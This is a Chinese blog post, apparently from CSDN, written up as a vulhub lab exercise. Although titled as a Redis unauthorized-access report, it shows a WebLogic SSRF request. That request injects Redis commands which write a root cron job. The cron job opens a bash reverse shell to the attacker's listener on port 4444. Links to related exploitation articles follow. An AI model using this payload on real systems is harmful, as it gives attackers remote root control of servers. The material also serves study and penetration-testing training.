Redis未授权访问漏洞报告

最新推荐文章于 2024-04-09 11:31:12 发布
最新推荐文章于 2024-04-09 11:31:12 发布
阅读量360 收藏
点赞数 1
文章标签: redis redis未授权访问
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZYH_boss/article/details/102469634
版权

环境使用:kali、vulhub、burp suite(bp)

开始:打开vulhub,打开终端,进入root
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
ifconfig查看ip地址
在这里插入图片描述
找到ip 为192.168.147.139
在这里插入图片描述

查看端口开放情况,7001开放
在这里插入图片描述

浏览器打开192.168.147.139:7001,发现404报错,是客户端错误,说明服务端开启的,只是访问失败
在这里插入图片描述
在后面加上/uddiexplorer/SearchPublicRegistries.jsp,发现跳到这个页面
在这里插入图片描述
在后面加上
uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
访问失败,也说明了服务器能访问,可以使用漏洞
在这里插入图片描述
在vulhub输入docker ps 找到ID和NAMES 然后使用docker exec -it ID/NAMES ip addr 找到ip
在这里插入图片描述
打开bp,使用bp抓包,改包
在这里插入图片描述
打开kali,ifconfig,并打开4444端口,等待连接
在这里插入图片描述
将set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.147.128/4444 0>&1\n\n\n\n” config set dir /etc/ config set dbfilename crontab save 进行url编码
在这里插入图片描述
将编码内容加入到链接
在这里插入图片描述
发现kali的4444端口连接成功
在这里插入图片描述退出,重新连接,一样成功
在这里插入图片描述
完成测试报告

弖峠
关注
redis授权访问个⼈总结
anquanzushiye的博客
01-17 1108
不避免排版错乱,影响阅读体验,部分源码内容通过点击左下角:阅读原文下载。前⾔: 刚好在整理授权系列的洞,就学习了⼀波关于redis的,如果哪⾥有讲的不对的地⽅还请各位⼤佬指出.在内...
Redis授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
第五章5.1redis授权访问漏洞
willow_liang的博客
10-14 675
5.1授权访问漏洞 在安全配置,权限认证,授权页面存在逻辑缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库网站等敏感信息写偶。目前存在授权访问漏洞的服务包括:NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,ZooKeeper等 5.1.1redis授权访问漏洞介绍 kali下载按照redis客户端redis-cli 1.获取redis资源   wget http://download.redis.io/releases/redis-4.0.
Redis安全攻防(一)授权访问复现
慢就是快
03-29 304
在渗透目标中遇到好几次,记录下方便学习,以后攻击利用。 靶机情况: 攻击机:192.168.199.187 / osx /redis4.0 目标机:192.168.199.136 / centos 7 /redis5.0 0x01 授权漏洞访问 1.1 wget 获取redis5.0(攻击机和靶机都需要redis环境) wget download.redis.io/releases/redis-5.0.0.tar.gz 1.2 解压 1.3 编译 Make编译,有的系统可能报错。是因为缺少G
redis授权访问总结
qq_45746681的博客
10-04 331
这里写自定义目录标题Centos搭建redisApache和php安装redis授权访问漏洞复现redis授权访问利用getshell方式利用定时任务进行反弹shell写入webshell方式进行连接redis授权访问的poc_*_ coding:utf-8 _*_ Centos搭建redis 首先,搭建redis,进行安装.以下为安装步骤: 1下载安装包命令为wget http://download.redis.io/releases/redis-2.8.17.tar.gz 2 tar xzvf
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问漏洞
周星星的博客
08-22 1547
Redis授权访问漏洞复现以及利用
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9609
redis授权访问漏洞
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1345
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
[Vulhub] Redis 4.x/5.x 授权访问漏洞
weixin_45605352的博客
07-16 2965
0x00 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /roo
Redis 授权访问引发的安全问题
weixin_45253622的博客
12-23 3636
Redis Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 默认端口:6379 安全问题 Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写
Redis授权漏洞检测工具
09-02 834
Redis授权检测小工具 #!/usr/bin/python3 # -*- coding: utf-8 -*- """ @Author: r0cky @Time: 2019/9/2-17:35 """ import socket import sys passwds = ['redis','root','oracle','password','p@ssw0rd','abc123!',...
【vulhub漏洞复现】redis 4-unacc 授权访问漏洞
RexHa的博客
03-03 4972
一、漏洞详情Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
redis授权访问漏洞【vulhub靶场】复现
m0_55854679的博客
08-01 879
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹
Redis授权访问docker复现
weixin_34342905的博客
10-24 661
docker搜索Redis镜像 docker search redis 拉去镜像到本地 docker pull redis 查看下载好的镜像 docker images 运行镜像 docker run -p 6379:6379 -d redis -p 将容器的6379端口映射到主机的6379端口。 -d 将容器后台运行。 查看运行中的镜像 docker ps POC构成 #!/usr/bin/en...
redis授权访问getshell
weixin_30567471的博客
12-12 156
redis授权访问的问题一年前就爆了,当时刚开始学安全,还不太懂。今天借着工作的机会来搞一把,看看能不能拿下一台服务器。其实前几天就写好了一直想找个实际环境复现一下,一直没有找到,只说下大致思路。 首先redis授权漏洞有几个先决条件,自己搭建漏洞环境的话需要在配置文件redis.conf中修改 1、允许其他网段连接 2、关闭protected-mode 漏洞的发现可以批量跑POC,...
vulhub漏洞复现57_Redis
weixin_44193247的博客
02-11 357
vulhub漏洞复现练习篇
Redis 授权访问漏洞利用及修复
Thunderclap的博客
06-25 4011
Redis 授权访问漏洞利用及修复
中间件漏洞攻防学习总结
最新发布
蚁景网安学院
04-09 1271
Apache(阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值